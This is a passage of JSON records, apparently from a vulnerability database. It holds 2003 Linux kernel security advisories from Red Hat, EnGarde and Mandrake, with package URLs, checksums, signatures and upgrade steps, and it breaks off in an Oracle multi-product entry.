7.3:\r\n\r\nSRPMS:\r\nftp://updates.redhat.com/7.3/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm\r\n\r\nathlon:\r\nftp://updates.redhat.com/7.3/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm\r\nftp://updates.redhat.com/7.3/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm\r\n\r\ni386:\r\nftp://updates.redhat.com/7.3/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.3/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.3/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.3/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm\r\n\r\ni586:\r\nftp://updates.redhat.com/7.3/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm\r\nftp://updates.redhat.com/7.3/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm\r\n\r\ni686:\r\nftp://updates.redhat.com/7.3/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.3/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.3/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.3/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm\r\n\r\nRed Hat Linux 8.0:\r\n\r\nSRPMS:\r\nftp://updates.redhat.com/8.0/en/os/SRPMS/kernel-2.4.18-24.8.0.src.rpm\r\n\r\nathlon:\r\nftp://updates.redhat.com/8.0/en/os/athlon/kernel-2.4.18-24.8.0.athlon.rpm\r\nftp://updates.redhat.com/8.0/en/os/athlon/kernel-smp-2.4.18-24.8.0.athlon.rpm\r\n\r\ni386:\r\nftp://updates.redhat.com/8.0/en/os/i386/kernel-2.4.18-24.8.0.i386.rpm\r\nftp://updates.redhat.com/8.0/en/os/i386/kernel-source-2.4.18-24.8.0.i386.rpm\r\nftp://updates.redhat.com/8.0/en/os/i386/kernel-doc-2.4.18-24.8.0.i386.rpm\r\nftp://updates.redhat.com/8.0/en/os/i386/kernel-BOOT-2.4.18-24.8.0.i386.rpm\r\n\r\ni586:\r\nftp://updates.redhat.com/8.0/en/os/i586/kernel-2.4.18-24.8.0.i586.rpm\r\nftp://updates.redhat.com/8.0/en/os/i586/kernel-smp-2.4.18-24.8.0.i586.rpm\r\n\r\ni686:\r\nftp://updates.redhat.com/8.0/en/os/i686/kernel-2.4.18-24.8.0.i686.rpm\r\nftp://updates.redhat.com/8.0/en/os/i686/kernel-smp-2.4.18-24.8.0.i686.rpm\r\nftp://updates.redhat.com/8.0/en/os/i686/kernel-bigmem-2.4.18-24.8.0.i686.rpm\r\nftp://updates.redhat.com/8.0/en/os/i686/kernel-debug-2.4.18-24.8.0.i686.rpm\r\n\r\n\r\n\r\n7. Verification:\r\n\r\nMD5 sum Package Name\r\n--------------------------------------------------------------------------\r\n4d0a3a9f1bcdfec8a014c5666a4c4501 7.1/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm\r\n7179efeb266bba7aa633a01267e24e74 7.1/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm\r\nfcd9c11db5c7c02bd8ac16c12260c0e6 7.1/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm\r\n63f1217de153ff63217515e1b016da33 7.1/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm\r\n03a071c1c7252869382d683b1ceefa9f 7.1/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm\r\n18dd6648f9d77d3d266e584c7c2feca4 7.1/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm\r\n040aafbd075ad5f4041fa086a8179c80 7.1/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm\r\n0a6684bc40e9f9f06d934dd806e182b3 7.1/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm\r\n35e33d5b3746db33bdf747bf4a866e00 7.1/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm\r\ne0f9b4ae807dd4ee026a026f8233e977 7.1/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm\r\nef2c961e676946329d5221fda16e2846 7.1/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm\r\n13e60edc74a4e9ae6efe396acab4eb70 7.1/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm\r\nc7b78cdeb9e72d94cfa80bbe49303241 7.1/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm\r\n4d0a3a9f1bcdfec8a014c5666a4c4501 7.2/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm\r\n7179efeb266bba7aa633a01267e24e74 7.2/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm\r\nfcd9c11db5c7c02bd8ac16c12260c0e6 7.2/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm\r\n63f1217de153ff63217515e1b016da33 7.2/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm\r\n03a071c1c7252869382d683b1ceefa9f 7.2/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm\r\n18dd6648f9d77d3d266e584c7c2feca4 7.2/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm\r\n040aafbd075ad5f4041fa086a8179c80 7.2/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm\r\n0a6684bc40e9f9f06d934dd806e182b3 7.2/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm\r\n35e33d5b3746db33bdf747bf4a866e00 7.2/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm\r\ne0f9b4ae807dd4ee026a026f8233e977 7.2/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm\r\nef2c961e676946329d5221fda16e2846 7.2/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm\r\n13e60edc74a4e9ae6efe396acab4eb70 7.2/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm\r\nc7b78cdeb9e72d94cfa80bbe49303241 7.2/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm\r\n4d0a3a9f1bcdfec8a014c5666a4c4501 7.3/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm\r\n7179efeb266bba7aa633a01267e24e74 7.3/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm\r\nfcd9c11db5c7c02bd8ac16c12260c0e6 7.3/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm\r\n63f1217de153ff63217515e1b016da33 7.3/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm\r\n03a071c1c7252869382d683b1ceefa9f 7.3/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm\r\n18dd6648f9d77d3d266e584c7c2feca4 7.3/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm\r\n040aafbd075ad5f4041fa086a8179c80 7.3/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm\r\n0a6684bc40e9f9f06d934dd806e182b3 7.3/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm\r\n35e33d5b3746db33bdf747bf4a866e00 7.3/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm\r\ne0f9b4ae807dd4ee026a026f8233e977 7.3/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm\r\nef2c961e676946329d5221fda16e2846 7.3/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm\r\n13e60edc74a4e9ae6efe396acab4eb70 7.3/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm\r\nc7b78cdeb9e72d94cfa80bbe49303241 7.3/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm\r\n3ab26ebfd1c80ba101b5b86bf5cd6421 8.0/en/os/SRPMS/kernel-2.4.18-24.8.0.src.rpm\r\n6e12213933aac18036ecbec4e9d0b0ac 8.0/en/os/athlon/kernel-2.4.18-24.8.0.athlon.rpm\r\n619979740d16881959d5f888aefaf195 8.0/en/os/athlon/kernel-smp-2.4.18-24.8.0.athlon.rpm\r\n2be552e4025aba02877ca21a0bd64007 8.0/en/os/i386/kernel-2.4.18-24.8.0.i386.rpm\r\n232613b661b5dc806647935bbab16cb0 8.0/en/os/i386/kernel-BOOT-2.4.18-24.8.0.i386.rpm\r\nb0dddbebe98c52bdeb737473319008a0 8.0/en/os/i386/kernel-doc-2.4.18-24.8.0.i386.rpm\r\n43ffe5e9be347b2da60d83cc03d64923 8.0/en/os/i386/kernel-source-2.4.18-24.8.0.i386.rpm\r\nd69f50521cb66ce09a9cefde417e8107 8.0/en/os/i586/kernel-2.4.18-24.8.0.i586.rpm\r\n91e3b03e57e7df41d1472b45ad151719 8.0/en/os/i586/kernel-smp-2.4.18-24.8.0.i586.rpm\r\n5ccc7bd0668a144b91580490ae487744 8.0/en/os/i686/kernel-2.4.18-24.8.0.i686.rpm\r\n551569c64e64b83c145dc17b08dd505b 8.0/en/os/i686/kernel-bigmem-2.4.18-24.8.0.i686.rpm\r\n56fafedd2ee58f288327fb56eaafd884 8.0/en/os/i686/kernel-debug-2.4.18-24.8.0.i686.rpm\r\nb125aab060782242428bdafb05edab93 8.0/en/os/i686/kernel-smp-2.4.18-24.8.0.i686.rpm\r\n\r\n\r\nThese packages are GPG signed by Red Hat, Inc. for security. Our key\r\nis available at http://www.redhat.com/about/contact/pgpkey.html\r\n\r\nYou can verify each package with the following command:\r\n \r\n rpm --checksig -v <filename>\r\n\r\nIf you only wish to verify that each package has not been corrupted or\r\ntampered with, examine only the md5sum with the following command:\r\n \r\n md5sum <filename>\r\n\r\n\r\n8. References:\r\n\r\nhttp://www.atstake.com/research/advisories/2003/a010603-1.txt\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0001\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0018\r\n\r\n9. Contact:\r\n\r\nThe Red Hat security contact is <security@redhat.com>. More contact\r\ndetails at http://www.redhat.com/solutions/security/news/contact.html\r\n\r\nCopyright 2003 Red Hat, Inc.\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2003-02-05T00:00:00", "title": "[RHSA-2003:025-20] Updated 2.4 kernel fixes various vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:07", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2003-0001", "CVE-2003-0018"], "modified": "2003-02-05T00:00:00", "id": "SECURITYVULNS:DOC:4047", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4047", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:07", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n+------------------------------------------------------------------------+\r\n| EnGarde Secure Linux Security Advisory March 18, 2003 |\r\n| http://www.engardelinux.org/ ESA-20030318-009 |\r\n| |\r\n| Package: kernel |\r\n| Summary: several vulnerabilities. |\r\n+------------------------------------------------------------------------+\r\n\r\n EnGarde Secure Linux is a secure distribution of Linux that features\r\n improved access control, host and network intrusion detection, Web\r\n based secure remote management, e-commerce, and integrated open source\r\n security tools.\r\n\r\nOVERVIEW\r\n- --------\r\n This update fixes several vulnerabilities in the Linux kernel.\r\n\r\n CAN-2002-1380\r\n -------------\r\n Local users could cause a denial of service by using the mmap()\r\n function with the PROT_READ parameter to access memory pages via the\r\n /proc/pid/mem interface.\r\n\r\n CAN-2003-0001\r\n -------------\r\n Most of the Ethernet card (NIC) device drivers did not pad frames with\r\n null bytes, leading to the potential leakage of kernel memory.\r\n\r\n CAN-2003-0127\r\n -------------\r\n There is a vulnerability in the kernel module loader which could\r\n allow a local attacker to obtain root privileges by using ptrace to\r\n attach to a child process spawned by the kernel when a new module is\r\n loaded.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\n assigned the names CAN-2002-1380, CAN-2003-0001, and CAN-2003-0127 to\r\n these issues.\r\n\r\n All users are recommended to upgrade immediately using the special\r\n SOLUTION in this advisory.\r\n\r\nSOLUTION\r\n- --------\r\n Users of the EnGarde Professional edition can use the Guardian Digital\r\n Secure Network to update their systems automatically.\r\n\r\n EnGarde Community users should upgrade to the most recent version\r\n as outlined in this advisory. Updates may be obtained from:\r\n\r\n ftp://ftp.engardelinux.org/pub/engarde/stable/updates/\r\n http://ftp.engardelinux.org/pub/engarde/stable/updates/\r\n\r\n Please read and understand this entire section before you attempt to\r\n upgrade the kernel.\r\n\r\n Initial Steps\r\n -------------\r\n 1) Verify the machine is either:\r\n\r\n a) booted into a "standard" kernel; or\r\n b) LIDS is disabled (/sbin/lidsadm -S -- -LIDS_GLOBAL)\r\n\r\n 2) Determine which kernels you currently have installed:\r\n\r\n # rpm -qa --qf "%{NAME}\n" | grep kernel\r\n\r\n 3) Download the new kernels that match what you have installed\r\n (based on step 2) from the "UPDATED PACKAGES" section of this\r\n advisory.\r\n\r\n Installation Steps\r\n ------------------\r\n 4) Install the new packages. The packages will automagically\r\n update /etc/lilo.conf by commenting out any old EnGarde images\r\n and replacing them with the new ones:\r\n\r\n # rpm --replacefiles -i kernel1 kernel2 ...\r\n\r\n 5) Re-run LILO. If you see any errors then open /etc/lilo.conf in\r\n your favorite text editor and make the appropriate changes:\r\n\r\n # /sbin/lilo\r\n\r\n Final Steps\r\n -----------\r\n 6) If you did not see any LILO errors then your new kernel is now\r\n installed and your machine is ready to be rebooted:\r\n\r\n # reboot\r\n\r\nUPDATED PACKAGES\r\n- ----------------\r\n These updated packages are for EnGarde Secure Linux Community\r\n Edition.\r\n\r\n Source Packages:\r\n\r\n SRPMS/kernel-2.2.19-1.0.30.src.rpm\r\n MD5 Sum: 5385352091faa056106dc1e92f7af7c1\r\n\r\n Binary Packages:\r\n\r\n i386/kernel-2.2.19-1.0.30.i386.rpm\r\n MD5 Sum: 9a16886321cc19365ea1a7d27d927b83\r\n\r\n i386/kernel-lids-mods-2.2.19-1.0.30.i386.rpm\r\n MD5 Sum: 784e3abd25e27db6036bd7638ac22ef6\r\n\r\n i386/kernel-smp-lids-mods-2.2.19-1.0.30.i386.rpm\r\n MD5 Sum: 42a9c7d7b5879e061d59d1008011dab7\r\n\r\n i386/kernel-smp-mods-2.2.19-1.0.30.i386.rpm\r\n MD5 Sum: 64b89dcd411abdd455bbb55539a29df6\r\n\r\n i686/kernel-2.2.19-1.0.30.i686.rpm\r\n MD5 Sum: af21a043fcde3004ad645ca4bb26117e\r\n\r\n i686/kernel-lids-mods-2.2.19-1.0.30.i686.rpm\r\n MD5 Sum: 8f90859a9313f731c710247e27915a42\r\n\r\n i686/kernel-smp-lids-mods-2.2.19-1.0.30.i686.rpm\r\n MD5 Sum: 74ff5e04d89e9a5b60d79f3fc0491034\r\n\r\n i686/kernel-smp-mods-2.2.19-1.0.30.i686.rpm\r\n MD5 Sum: 1fa7cffecc2fd417713f67c4bb19da90\r\n\r\nREFERENCES\r\n- ----------\r\n Guardian Digital's public key:\r\n http://ftp.engardelinux.org/pub/engarde/ENGARDE-GPG-KEY\r\n\r\n Official Web Site of the Linux Kernel:\r\n http://www.kernel.org/\r\n\r\n Security Contact: security@guardiandigital.com\r\n EnGarde Advisories: http://www.engardelinux.org/advisories.html\r\n\r\n- --------------------------------------------------------------------------\r\n$Id: ESA-20030318-009-kernel,v 1.2 2003/03/18 15:35:22 rwm Exp $\r\n- --------------------------------------------------------------------------\r\nAuthor: Ryan W. Maple <ryan@guardiandigital.com>\r\nCopyright 2003, Guardian Digital, Inc.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.6 (GNU/Linux)\r\nComment: For info see http://www.gnupg.org\r\n\r\niD8DBQE+dz2sHD5cqd57fu0RAuvSAJ9lXxgMrxLUL4dbJN0LhFrqjIXMzACgmPyD\r\npgl8KGYszwaCO5uGbL7laZs=\r\n=XrzW\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2003-03-19T00:00:00", "title": "[ESA-20030318-009] Several 'kernel' vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:07", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2003-0127", "CVE-2003-0001", "CVE-2002-1380"], "modified": "2003-03-19T00:00:00", "id": "SECURITYVULNS:DOC:4233", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4233", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:07", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n________________________________________________________________________\r\n\r\n Mandrake Linux Security Update Advisory\r\n________________________________________________________________________\r\n\r\nPackage name: kernel\r\nAdvisory ID: MDKSA-2003:066\r\nDate: June 11th, 2003\r\n\r\nAffected versions: 9.1\r\n________________________________________________________________________\r\n\r\nProblem Description:\r\n\r\n Multiple vulnerabilities were discovered and fixed in the Linux kernel.\r\n \r\n * CAN-2003-0001: Multiple ethernet network card drivers do not pad\r\n frames with null bytes which allows remote attackers to obtain\r\n information from previous packets or kernel memory by using\r\n special malformed packets.\r\n \r\n * CAN-2003-0244: The route cache implementation in the 2.4 kernel and\r\n the Netfilter IP conntrack module allows remote attackers to cause a\r\n Denial of Service (DoS) via CPU consumption due to packets with\r\n forged source addresses that cause a large number of hash table\r\n collisions related to the PREROUTING chain.\r\n \r\n * CAN-2003-0246: The ioperm implementation in 2.4.20 and earlier\r\n kernels does not properly restrict privileges, which allows local\r\n users to gain read or write access to certain I/O ports.\r\n \r\n * CAN-2003-0247: A vulnerability in the TTY layer of the 2.4 kernel\r\n allows attackers to cause a kernel oops resulting in a DoS.\r\n \r\n * CAN-2003-0248: The mxcsr code in the 2.4 kernel allows attackers to\r\n modify CPU state registers via a malformed address.\r\n \r\n As well, a number of bug fixes were made in the 9.1 kernel including:\r\n \r\n * Support for more machines that did not work with APIC\r\n * Audigy2 support\r\n * New/updated modules: prims25, adiusbadsl, thinkpad, ieee1394,\r\n orinoco, via-rhine, \r\n * Fixed SiS IOAPIC\r\n * IRQ balancing has been fixed for SMP\r\n * Updates to ext3\r\n * The previous ptrace fix has been redone to work better\r\n \r\n MandrakeSoft encourages all users to upgrade to these new kernels.\r\n Updated kernels will be available shortly for other supported platforms\r\n and architectures.\r\n________________________________________________________________________\r\n\r\nReferences:\r\n \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0001\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0244\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0246\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0247\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0248\r\n________________________________________________________________________\r\n\r\nUpdated Packages:\r\n \r\n Mandrake Linux 9.1:\r\n bca5bada0476e53911f157e9ec5ca504 9.1/RPMS/kernel-2.4.21.0.18mdk-1-1mdk.i586.rpm\r\n 57ee4b2b038598cbd020f1e0752a61dd 9.1/RPMS/kernel-BOOT-2.4.21.0.18mdk-1-1mdk.i586.rpm\r\n b14c3291fab83bd1894c8b5217311dfa 9.1/RPMS/kernel-doc-2.4.21-0.18mdk.i586.rpm\r\n ed766922171751e1f05c6ce590af9755 9.1/RPMS/kernel-enterprise-2.4.21.0.18mdk-1-1mdk.i586.rpm\r\n 64c554564115626ff86cf3fd5e40ece1 9.1/RPMS/kernel-secure-2.4.21.0.18mdk-1-1mdk.i586.rpm\r\n 944017f71e79714767d94517cd41110d 9.1/RPMS/kernel-smp-2.4.21.0.18mdk-1-1mdk.i586.rpm\r\n 9621bebecb94bc6031ffaa073c4967f1 9.1/RPMS/kernel-source-2.4.21-0.18mdk.i586.rpm\r\n 9d0c651808a2874256489f3a90ad6fdb 9.1/SRPMS/kernel-2.4.21.0.18mdk-1-1mdk.src.rpm\r\n________________________________________________________________________\r\n\r\nBug IDs fixed (see https://qa.mandrakesoft.com for more information):\r\n________________________________________________________________________\r\n\r\nTo upgrade automatically, use MandrakeUpdate. The verification of md5\r\nchecksums and GPG signatures is performed automatically for you.\r\n\r\nIf you want to upgrade manually, download the updated package from one\r\nof our FTP server mirrors and upgrade with "rpm -Fvh *.rpm". A list of\r\nFTP mirrors can be obtained from:\r\n\r\n http://www.mandrakesecure.net/en/ftp.php\r\n\r\nPlease verify the update prior to upgrading to ensure the integrity of\r\nthe downloaded package. You can do this with the command:\r\n\r\n rpm --checksig <filename>\r\n\r\nAll packages are signed by MandrakeSoft for security. You can obtain\r\nthe GPG public key of the Mandrake Linux Security Team from:\r\n\r\n https://www.mandrakesecure.net/RPM-GPG-KEYS\r\n\r\nPlease be aware that sometimes it takes the mirrors a few hours to\r\nupdate.\r\n\r\nYou can view other update advisories for Mandrake Linux at:\r\n\r\n http://www.mandrakesecure.net/en/advisories/\r\n\r\nMandrakeSoft has several security-related mailing list services that\r\nanyone can subscribe to. Information on these lists can be obtained by\r\nvisiting:\r\n\r\n http://www.mandrakesecure.net/en/mlist.php\r\n\r\nIf you want to report vulnerabilities, please contact\r\n\r\n security_linux-mandrake.com\r\n\r\nType Bits/KeyID Date User ID\r\npub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team\r\n <security linux-mandrake.com>\r\n\r\n- -----BEGIN PGP PUBLIC KEY BLOCK-----\r\nVersion: GnuPG v1.0.7 (GNU/Linux)\r\n\r\nmQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday\r\nL4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7\r\nWKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo\r\nP0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl\r\nhynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx\r\nPFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg\r\n2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs\r\niyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD\r\nLLFs7OuVfaydLQYp1iiN6D+LJDSMPM8/LCWzZsgr9EKJ8NXiyrQ6TGludXggTWFu\r\nZHJha2UgU2VjdXJpdHkgVGVhbSA8c2VjdXJpdHlAbGludXgtbWFuZHJha2UuY29t\r\nPohWBBMRAgAWBQI5aefeBAsKBAMDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmK6LAKCy\r\n/NInDsaMSI+WHwrquwC5PZrcnQCeI+v3gUDsNfQfiKBvQSANu1hdulqIRgQQEQIA\r\nBgUCOtNVGQAKCRBZ5w3um0pAJJWQAKDUoL5He+mKbfrMaTuyU5lmRyJ0fwCgoFAP\r\nWdvQlu/kFjphF740XeOwtOqIRgQQEQIABgUCOu8A6QAKCRBynDnb9lq3CnpjAJ4w\r\nPk0SEE9U4r40IxWpwLU+wrWVugCdFfSPllPpZRCiaC7HwbFcfExRmPaIRgQQEQIA\r\nBgUCPI+UAwAKCRDniYrgcHcf8xK5AKCm/Mq8qP8GE0o1hEX22QsJMZwH5gCfZ72H\r\n8TacOb3oAmBdprf+K6gkdOiIRgQQEQIABgUCOtOieAAKCRCv2bZyU0yB80MeAJ9K\r\n+jXt0cKuaUonRU+CRGetk6t9dgCfTRRL6/puOKdD6md70+K5EBBSvsG0OE1hbmRy\r\nYWtlIExpbnV4IFNlY3VyaXR5IFRlYW0gPHNlY3VyaXR5QG1hbmRyYWtlc29mdC5j\r\nb20+iFcEExECABcFAjyPnuUFCwcKAwQDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmFi+\r\nAJsHhohgnU3ik4+gy3EdFlB2i/MBoACg6lHn5cnVvTcmgNccWxeNxLLZI5e5AQ0E\r\nOWnn7xAEAOQlTVY4TiNo5V/iP0J1xnqjqlqZsU7yEBKo/gZz6/+hx75RURe1ebiJ\r\n9F779FQbpJ9Epz1KLSXvq974rnVb813zuGdmgFyk+ryA/rTR2RQ8h+EoNkwmATzR\r\nxBXVJb57fFQjxOu4eNjZAtfII/YXb0uyXXrdr5dlJ/3eXrcO4p0XAAMFBACCxo6Z\r\n269s+A4v8C6Ui12aarOQcCDlV8cVG9LkyatU3FNTlnasqwo6EkaP572448weJWwN\r\n6SCXVl+xOYLiK0hL/6Jb/O9Agw75yUVdk+RMM2I4fNEi+y4hmfMh2siBv8yEkEvZ\r\njTcl3TpkTfzYky85tu433wmKaLFOv0WjBFSikohGBBgRAgAGBQI5aefvAAoJEJqo\r\n0NAiRYqYid0AoJgeWzXrEdIClBOSW5Q6FzqJJyaqAKC0Y9YI3UFlE4zSIGjcFlLJ\r\nEJGXlA==\r\n=yGlX\r\n- -----END PGP PUBLIC KEY BLOCK-----\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (GNU/Linux)\r\n\r\niD8DBQE+56V+mqjQ0CJFipgRAu0bAJsElc3QmEl4WBRhUO7PNwit3HAjrwCfSClk\r\n972cH4+NoFhTz+l8rQg1o88=\r\n=rOjs\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2003-06-21T00:00:00", "title": "MDKSA-2003:066 - Updated kernel packages fix multiple vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:07", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2003-06-21T00:00:00", "id": "SECURITYVULNS:DOC:4715", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4715", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:58", "references": [], "description": "Over 150 vulnerabilities in different applications are closed in auqrterly update.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-01-25T00:00:00", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:58", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Oracle Enterprise Asset Management", "version": "8.2", "operator": "eq"}, {"name": "Wavese", "version": "8.1", "operator": "eq"}, {"name": "Java SE", "version": "8", "operator": "eq"}, {"name": "Oracle Forms", "version": "11.1", "operator": "eq"}, {"name": "MICROS Retail", "version": "3.5", "operator": "eq"}, {"name": "Fusion Middleware", "version": "11.1", "operator": "eq"}, {"name": "MICROS Retail", "version": "5.5", "operator": "eq"}, {"name": "Healthcare Master Person Index", "version": "2", "operator": "eq"}, {"name": "Oracle", "version": "12.1", "operator": "eq"}, {"name": "MICROS Retail", "version": "6.5", "operator": "eq"}, {"name": "Oracle HTTP Server", "version": "10.1", "operator": "eq"}, {"name": "SOA Suite", "version": "11.1", "operator": "eq"}, {"name": "Java SE Embedded", "version": "8", "operator": "eq"}, {"name": "Communications Diameter Signaling Router", "version": "5.0", "operator": "eq"}, {"name": "Exalogic Infrastructure", "version": "2.0", "operator": "eq"}, {"name": "Siebel Applications", "version": "8.2", "operator": "eq"}, {"name": "WebLogic Portal", "version": "10.3", "operator": "eq"}, {"name": "BI Publisher", "version": "10.1", "operator": "eq"}, {"name": "RTD Platform", "version": "3.0", "operator": "eq"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1", "operator": "eq"}, {"name": "Oracle Real-Time Decision Server", "version": "11.1", "operator": "eq"}, {"name": "Oracle E-Business Suite", "version": "12.2", "operator": "eq"}, {"name": "Oracle Transportation Management", "version": "6.3", "operator": "eq"}, {"name": "Oracle E-Business Suite", "version": "11.5", "operator": "eq"}, {"name": "Solaris Cluster", "version": "3.3", "operator": "eq"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "eq"}, {"name": "SOA Suite", "version": "12.1", "operator": "eq"}, {"name": "Solaris Cluster", "version": "4.1", "operator": "eq"}, {"name": "Enterprise Manager Ops Center", "version": "11.1", "operator": "eq"}, {"name": "Enterprise Manager Base Platform", "version": "12.1", "operator": "eq"}, {"name": "Integrated Lights Out Manager", "version": "3.2", "operator": "eq"}, {"name": "WebLogic Server", "version": "12.1", "operator": "eq"}, {"name": "OpenSSO", "version": "8.0", "operator": "eq"}, {"name": "WebLogic Server", "version": "10.3", "operator": "eq"}, {"name": "MICROS Retail", "version": "4.8", "operator": "eq"}, {"name": "Oracle Containers for J2EE", "version": "10.1", "operator": "eq"}, {"name": "MySQL Server", "version": "5.6", "operator": "eq"}, {"name": "GlassFish Server", "version": "3.1", "operator": "eq"}, {"name": "Agile PLM for Process", "version": "6.1", "operator": "eq"}, {"name": "Oracle Directory Server", "version": "11.1", "operator": "eq"}, {"name": "Oracle Reports", "version": "11.1", "operator": "eq"}, {"name": "WebCenter Content", "version": "11.1", "operator": 